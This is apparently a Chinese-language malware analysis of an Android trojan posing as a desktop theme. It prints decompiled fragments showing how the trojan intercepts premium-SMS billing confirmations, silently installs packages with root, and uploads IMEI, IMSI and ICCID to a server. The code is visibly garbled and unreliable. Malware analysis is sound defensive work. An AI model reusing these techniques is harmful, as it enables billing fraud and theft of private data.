一、Android木马介绍
Android系统比iPhone系统更开放,允许安装第三方应用程序,甚至是那些没有获得谷歌应用商店AndroidMarket批准的应用程序,但这种开放性似乎也增加了安全风险。AndroidMarke本身也发现了恶意软件感染的应用程序,不过用户可以像在个人电脑上所做的那样,通过安装杀毒软件来加以防范。
二.概述
该程序安装完是一款桌面主题,并可设置壁纸等。运行后获取ROOT权限,私自下载安装程序;并发送扣费短信,订制SP服务,拦截掉回执的扣费确认短信,恶意消耗用户资费;窃取用户通讯录信息等隐私资料,并上传到服务器。
三、样本特征
1.敏感权限
uses-permission android:name=android.permission.DELETE_PACKAGES /uses-permission uses-permission android:name=android.permission.INSTALL_PACKAGES /uses-permission uses-permission android:name=android.permission.READ_CONTACTS /uses-permission android.setting.START_SEND_SMS android.setting.SMS_SENT android.provider.Telephony.SMS_RECEIVED
2.入口点和恶意模块
publicclassMyReceiverextendsBroadcastReceiver{}(1).发送拦截短信:
Stringstr39=android.setting.SMS_SENT;
try
{
Stringstr41=arrayOfSmsMessage[i13].getOriginatingAddress();
localSmsManager4.sendMultipartTextMessage(str41,
null,
localArrayList5,localArrayList7,null);
}
if(!paramIntent.getAction().equals(android.provider.Telephony.SMS_RECEIVED))
if((arrayOfSmsMessage[i13].getOriginatingAddress().contains(10658166))||
(arrayOfSmsMessage[i13].getMessageBody().contains(83589523))
||
||
||
||
||
||
(arrayOfSmsMessage[i13].getMessageBody().contains(
(arrayOfSmsMessage[i13].getMessageBody().contains(
(arrayOfSmsMessage[i13].getMessageBody().contains(1.00
(arrayOfSmsMessage[i13].getMessageBody().contains(2.00
客资服费))))元))元))
(arrayOfSmsMessage[i13].getMessageBody().contains(元/条))
(arrayOfSmsMessage[i13].getMessageBody().contains(元/次)))
abortBroadcast();(2).获取ROOT权限,安装卸载程序:
privatevoidinstallApk(StringparamString1,StringparamString2)
try
{
RuntimelocalRuntime=Runtime.getRuntime();
StringBuilderlocalStringBuilder=newStringBuilder(sudopm
install-r);
FilelocalFile2=this.mContext.getFilesDir();
Stringstr=localFile2+/+paramString2;
ProcesslocalProcess=localRuntime.exec(str);
}
privatevoidinstallAPK()
privatevoiduninstallPlugin()
{
try
{
inti=Log.d(agui,uninstall);
ProcesslocalProcess=Runtime.getRuntime().exec(pmuninstall-r
android远程监控技术
com.newline.root);
IntentlocalIntent1=newIntent(android.intent.action.RUN);
ContextlocalContext=this.mContext;
IntentlocalIntent2=localIntent1.setClass(localContext,MyService.class);
ComponentName
localComponentName
=
this.mContext.startService(localIntent1);
return;
}(3).窃取上传隐私资料:
Stringstr8=Long.toString(System.currentTimeMillis()); ObjectlocalObject1=localHashtable.put(id,str8); ObjectlocalObject2=localHashtable.put(imsi,str4); ObjectlocalObject3=localHashtable.put(imei,str5); ObjectlocalObject4=localHashtable.put(iccid,str6); ObjectlocalObject5=localHashtable.put(mobile,str7); Stringstr9=TimeUtil.dateToString(newDate(),yyyyMMddHHmmss); ObjectlocalObject6=localHashtable.put(ctime,str9); ObjectlocalObject7=localHashtable.put(osver,1); ObjectlocalObject8=localHashtable.put(cver,010101); ObjectlocalObject9=localHashtable.put(uid,str1); ObjectlocalObject10=localHashtable.put(bid,str2); ObjectlocalObject11=localHashtable.put(pid,str3); ObjectlocalObject12=localHashtable.put(softid,paramString2); MessageService.4 local4 = new MessageService.4(this, paramIResponseListener); NetTasklocalNetTask=newNetTask(localHashtable,utf-8,0,local4); String[]arrayOfString=newString[1]; arrayOfString[0]=paramString1; AsyncTasklocalAsyncTask=localNetTask.execute(arrayOfString); publicclassNetTaskextendsAsyncTaskString,Integer,String protectedStringdoInBackground(String[]paramArrayOfString) URLlocalURL1=newjava/net/URL; Stringstr5=localStringBuffer1.toString(); URLlocalURL2=localURL1; Stringstr6=str5; localURL2.init(str6); localHttpURLConnection = (HttpURLConnection)localURL1.openConnection(); localHttpURLConnection.setRequestMethod(GET); localHttpURLConnection.setConnectTimeout(5000); localHttpURLConnection.setReadTimeout(5000);
3.敏感字符串
(sudopminstall-r); installAPK(); contains(10658166) contains(83589523) contains(客服)contains(资费)
四、行为分析
运行后获取ROOT权限,私自下载安装程序;并发送扣费短信,订制SP服务,拦截掉回执的扣费确认短信,恶意消耗用户资费;窃取用户通讯录信息等隐私资料,并上传到服务器。
本文内容所提及均为本地测试或经过目标授权同意,旨在提供教育和研究信息,内容已去除关键敏感信息和代码,以防止被恶意利用。作者不鼓励或支持任何形式的非法行为。